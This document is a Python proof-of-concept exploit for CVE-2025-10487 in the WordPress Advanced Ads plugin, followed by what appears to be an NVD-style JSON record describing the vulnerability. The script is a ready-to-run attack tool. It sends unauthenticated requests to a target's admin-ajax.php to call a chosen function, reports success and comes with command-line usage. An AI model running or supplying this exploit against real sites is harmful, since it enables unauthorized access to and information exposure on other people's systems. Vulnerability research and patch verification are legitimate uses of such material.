CVE-2025-10487

import requests import sys # CVE-2025-10487 PoC - Advanced Ads Plugin Unauthorized Function Call # Target: WordPress site with Advanced Ads plugin <= 2.0.12 def exploit_cve_2025_10487(target_url, func_name='get_the_excerpt'): """ Exploit for CVE-2025-10487: Advanced Ads Plugin Remote Code execution via unauthorized AJAX endpoint function call. Args: target_url: Base URL of the WordPress site func_name: WordPress function to call (default: get_the_excerpt) Returns: Response content from the exploited endpoint """ endpoint = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php" payload = { 'action': 'advads_ad_select_one', 'func': func_name } headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } try: print(f"[*] Targeting: {target_url}") print(f"[*] Exploiting endpoint: {endpoint}") print(f"[*] Calling function: {func_name}") response = requests.post(endpoint, data=payload, headers=headers, timeout=10) print(f"[+] Status Code: {response.status_code}") print(f"[+] Response Length: {len(response.text)} bytes") if response.status_code == 200: print("[+] Exploit executed successfully!") print(f"[+] Response:\n{response.text[:500]}") return response.text else: print("[-] Exploit failed - check target or plugin version") return None except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None if __name__ == '__main__': if len(sys.argv) < 2: print("Usage: python cve-2025-10487.py <target_url> [function_name]") print("Example: python cve-2025-10487.py https://example.com get_the_excerpt") sys.exit(1) target = sys.argv[1] func = sys.argv[2] if len(sys.argv) > 2 else 'get_the_excerpt' exploit_cve_2025_10487(target, func)

{"cve": {"id": "CVE-2025-10487", "sourceIdentifier": "[email protected]", "published": "2025-11-01T07:15:33.610", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Advanced Ads – Ad Manager & AdSense plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 2.0.12 via the select_one() function. This is due to the endpoint not properly restricting access to the AJAX endpoint or limiting the functions that can be called to safe functions. This makes it possible for unauthenticated attackers to call arbitrary functions beginning with get_the_ like get_the_excerpt which can make information exposure possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3381123%40advanced-ads&new=3381123%40advanced-ads&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3efe6b81-72db-4419-92a3-26e22ebf46e8?source=cve", "source": "[email protected]"}]}}